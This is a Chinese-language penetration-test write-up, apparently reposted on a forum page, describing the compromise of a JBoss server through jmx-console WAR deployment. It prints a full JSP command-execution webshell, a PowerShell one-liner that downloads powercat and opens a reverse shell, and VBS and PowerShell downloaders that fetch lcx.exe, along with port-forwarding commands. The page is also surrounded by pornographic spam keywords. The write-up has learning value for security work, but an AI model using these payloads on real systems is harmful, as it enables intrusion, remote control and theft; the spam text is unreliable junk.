色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

一次不完美的Jboss滲透

jf_Fo0qk3ln ? 來源:先知社區 ? 2023-03-07 10:54 ? 次閱讀

一.前言

最近做滲透測試中遇到一個jboss的站,在其中學到一些在乙方工作挺有用的技巧(這次測試是進過授權測試)在次分享一下

二.信息收集

先通過namp進行掃描,同時進行目錄掃描,發現8080/jmx-console/,發現是jboss的站,百度到jboss可以部署war包getshell,訪問http://xxxx:8080//jmx-console/

三.漏洞利用

全局搜索jboss.system,點擊進入

571dc0be-bc74-11ed-bfe3-dac502259ad0.png

1.制作war包把木馬文件gg.jsp(我是一個直接執行命令代碼)用壓縮軟件壓縮為zip,然后更改后綴為war,然后將該war上傳到互聯網上能夠訪問的網
站上

	//gg.jsp <%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %> <html> <head> <title>title> <meta http-equiv="Content-Type" content="text/html; charset=big5"> head> <body> <% Runtime runtime = Runtime.getRuntime(); Process process =null; String line=null; InputStream is =null; InputStreamReader isr=null; BufferedReader br =null; String ip=request.getParameter("cmd"); try { process =runtime.exec(ip); is = process.getInputStream(); isr=new InputStreamReader(is); br =new BufferedReader(isr); out.println("
"); while( (line = br.readLine()) != null ) { out.println(line); out.flush(); } out.println("
"
); is.close(); isr.close(); br.close(); } catch(IOException e ) { out.println(e); runtime.exit(1); } %> body> html> 我這里就用python 簡單創建個ftp服務(這也是python的一個巧用)

	python -m SimpleHTTPServer 8589 

57368a18-bc74-11ed-bfe3-dac502259ad0.png

57513926-bc74-11ed-bfe3-dac502259ad0.png

2.進入jboss.system頁面找到如下,填入遠程的war文件地址

5764818e-bc74-11ed-bfe3-dac502259ad0.png

成功部署的界面如下

57b992c8-bc74-11ed-bfe3-dac502259ad0.png

3.訪問shell地址,并執行命令

581b2024-bc74-11ed-bfe3-dac502259ad0.png

四.進一步滲透

1.在獲得php shell的基礎上,我們需要一個真正的cmd shell,這樣有利于操作,進過nmap掃描,發現是windows,我們可以通過powershell進行shell反彈

	powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd 

5836da6c-bc74-11ed-bfe3-dac502259ad0.png

本地監聽,成功獲取一個cmd shell,接下來就是提權了

585f11ee-bc74-11ed-bfe3-dac502259ad0.png

2.在cmd 中查看端口開放信息,3389和445都開放了 想到了永恒之藍打一波,先看看打沒打永恒之藍的補丁,和看看系統信息,發現打了很多補丁

58820c8a-bc74-11ed-bfe3-dac502259ad0.png

可以通過如下鏈接查看補丁編號 網址:https://micro8.gitbook.io/micro8/contents-1/1-10/1windows-ti-quan-kuai-su-cha-zhao-exp 查找永恒之藍補丁編號進行比對發現該目標機器并沒打補丁

58b30f9c-bc74-11ed-bfe3-dac502259ad0.png

58f140f0-bc74-11ed-bfe3-dac502259ad0.png

3.看端口掃描結果,3389過濾了,445也過濾了,只有端口轉發再打了

5926d6e8-bc74-11ed-bfe3-dac502259ad0.png

4.先在shell中查看有那些任務,看看有沒殺毒軟件,初看沒有,但后來才發現了,居然有卡巴斯基

5949d832-bc74-11ed-bfe3-dac502259ad0.png

5.沒事就到處瀏覽目錄查看內容(發現google賬號密碼居然記錄在txt文件中),發現任何目錄都能瀏覽和看信息,就懷疑這個用戶的權限,趕緊看了哈…居然是administrator 組的,那提權就不用了澀,但還是想3389連進去

5967c23e-bc74-11ed-bfe3-dac502259ad0.png

6.打算用vbs下載一個lcx或者EarthWorm進行端口轉發,vbs下載代碼,一般下載在C:WindowsTemp目錄下,可讀可寫vbs下載代碼

	echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs echo Post.Open "GET","http://ip/lcxx/lcx.exe",0 >>download.vbs echo Post.Send() >>download.vbs echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs echo aGet.Mode = 3 >>download.vbs echo aGet.Type = 1 >>download.vbs echo aGet.Open() >>download.vbs echo aGet.Write(Post.responseBody) >>download.vbs echo aGet.SaveToFile "C:WindowsTemp2.txt",2 >>download.vbspowershell 下載代碼

	powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:7667/lcxx/lcx.exe','C:WindowsTemp2.txt')7.當自己寫進去了后,更名為exe執行的時候,被殺了,最后又看了下任務,才發現卡巴斯基,然后就一直被卡在這里8.lcx命令如下lcx 命令

	//被攻擊機器 lcx -slave 自己外網ip 51 內網ip 3389 //攻擊機器 lcx.exe -listen 51 9090由于防火墻限制,部分端口如3389無法通過防火墻,此時可以將該目標主機的3389端口透傳到防火墻允許的其他端口,如53端口.

	lcx -tran 53 目標主機ip 3389

總結

雖然暫時沒有成功,但從中還是學到許多滲透知識,也明白了實戰能提高許多技術。不足就是知識不夠,還需努力。


審核編輯 :李倩


聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 漏洞
    +關注

    關注

    0

    文章

    204

    瀏覽量

    15368
  • 滲透
    +關注

    關注

    0

    文章

    20

    瀏覽量

    6273
  • Shell
    +關注

    關注

    1

    文章

    365

    瀏覽量

    23358

原文標題:實戰|一次不完美的Jboss滲透

文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    不完美的伴侶機器人?

    在與人類交互的過程中,表現出與人類相似的不完美,我們就有信心建立起長期的人機關系?!薄 ?b class='flag-5'>一位研究員在接受BBC采訪時說,機器人的開發取決于用途,工業機器人當然需要很完美,我們不希望它們犯錯誤。但是對伴侶機器人來說,它們的行為很重
    發表于 12-28 14:42

    Linux環境下怎么安裝配置JBoss

    系統信息操作系統:CentOS 7JDK版本:1.8 JBoss版本:JBoss EAP 6.2
    發表于 07-18 08:12

    讓STM32完美的處理字符串

    今天因為想讓STM32完美的處理字符串,所以就想著讓STM32嵌入lua,本來想用f103c8t6,但是編譯就提示內存不足......所以單片機的型號選擇的\我下載到了RBT6的芯片上測試的先說
    發表于 08-20 08:11

    循環充放電一次就是少一次壽命嗎?

    循環充放電一次就是少一次壽命嗎?循環就是使用,我們是在使用電池,關心的是使用的時間,為了衡量充電電池的到底可以使用多長時間這樣個性能,就規定了循環
    發表于 09-07 02:06 ?2057次閱讀

    一次波過程的等值電路

    一次波過程的等值電路 圖 一次波過程的等值電路 在電動機端子上安裝阻抗匹配器可
    發表于 07-18 11:24 ?1700次閱讀
    <b class='flag-5'>一次</b>波過程的等值電路

    一次電池為什么不能被充電?

    一次電池為什么不能被充電? 一次電池不能被充電再生是構成一次電池體系的本性所決定的,因為一次電池的電極反應不可逆,也就是說,放電后的放電產
    發表于 10-28 15:29 ?5853次閱讀

    循環充放電一次就是少一次壽命嗎?

    循環充放電一次就是少一次壽命嗎?     循環就是使用,我們是在使用電池,關心的是使
    發表于 11-11 13:59 ?849次閱讀

    電池循環充放電一次就是少一次壽命嗎?

    電池循環充放電一次就是少一次壽命嗎? 循環就是使用,我們是在使用電池,關心的是使用的時間,為了衡量充電電池
    發表于 09-06 11:05 ?3594次閱讀

    游戲AI的前世今生,完美的目標不完美的世界

    。AlphaGo Zero的第一次嘗試是完全隨機的,在每場比賽結束后,它都會對所取得勝利和未取勝的新知識進行總結。經過訓練,最后這個AI和曾擊敗過李世石的AlphaGo直接對決,以100比0拿下了徹底的勝利。
    的頭像 發表于 08-28 09:00 ?3087次閱讀

    微軟SurfaceHeadphones無線降噪耳機體驗 一次驚艷但不完美的嘗試

    隨著越來越多的手機選擇砍掉 3.5 毫米耳機插孔,無線藍牙耳機從前幾年的小眾產品迅速變成了很多用戶的剛需。
    的頭像 發表于 04-23 09:58 ?5893次閱讀

    電氣一次識圖基礎

    電氣一次識圖基礎
    的頭像 發表于 11-12 11:24 ?2117次閱讀

    記腳本小子的一次滲透全過程

    .前言 在一次綜合滲透的過程中遇到的比較完整的滲透流程。很多現查的技巧,這次滲透的基礎是基
    的頭像 發表于 06-14 09:21 ?561次閱讀
    記腳本小子的<b class='flag-5'>一次</b><b class='flag-5'>滲透</b>全過程

    一次電池與二電池介紹

    電池大致可分為“一次電池”和“二電池”。 “一次電池”是一次用完就處理掉的一次性電池, 而可以反復充電循環使用的電池稱為“二
    的頭像 發表于 07-05 17:24 ?4667次閱讀
    <b class='flag-5'>一次</b>電池與二<b class='flag-5'>次</b>電池介紹

    一次調頻和二調頻的概念 一次調頻可以實現無差調節?

    一次調頻和二調頻的概念 一次調頻可以實現無差調節? 、一次調頻和二調頻的概念 1.
    的頭像 發表于 10-17 16:15 ?9329次閱讀

    基波是一次諧波么 基波與一次諧波的區別

    基波是一次諧波么 基波與一次諧波的區別? 基波和一次諧波是兩個不同的概念。 基波是在諧波分析中指的是頻率最低且沒有任何諧波成分的波形,它是構成復雜波形的基礎。在正弦波中,基波就是正弦波的本身。基波
    的頭像 發表于 04-08 17:11 ?7470次閱讀
    主站蜘蛛池模板: 最近中文字幕MV高清在线视频| 暖暖 视频 在线 观看 高清| 国产成人精品综合在线| 99国产强伦姧在线看RAPE| 樱桃BT在线观看| 一道本av免费不卡播放| 一个人在线观看的视频| 亚洲裸舞 hd| 午夜小视频免费观看| 天美麻豆成人AV精品| 色欲AV色欲AV久久麻豆| 人人插人人射| 色网址在线观看| 挺进老师的紧窄小肉六电影完整版| 特黄特黄aaaa级毛片免费看| 神马伦理2019影院不卡片| 私密按摩师在线观看 百度网盘| 色AV色婷婷96人妻久久久| 色婷婷亚洲精品天天综合影院| 色-情-伦-理一区二区三区| 十8禁用B站在线看漫画| 天堂色| 小SAO货叫大声点妓女| 亚洲高清在线精品一区| 亚洲免费在线| 中文字幕一区久久久久| 99久久婷婷国产综合精品青草| JAVASCRIPTJAVA水多多| 吃奶摸下的羞羞漫画| 国产精品2020观看久久| 国精产品砖一区二区三区糖心| 精品视频在线播放| 毛片手机在线看| 亚洲日韩有码无线免费| 真人女人无遮挡内谢免费视频%| 2019午夜福利757视频第12集| 99热在线免费播放| 荡乳乱公小说| 好紧小嫩嫩水的10p| 猫咪av永久最新域名| 日本xxxx裸体xxxx|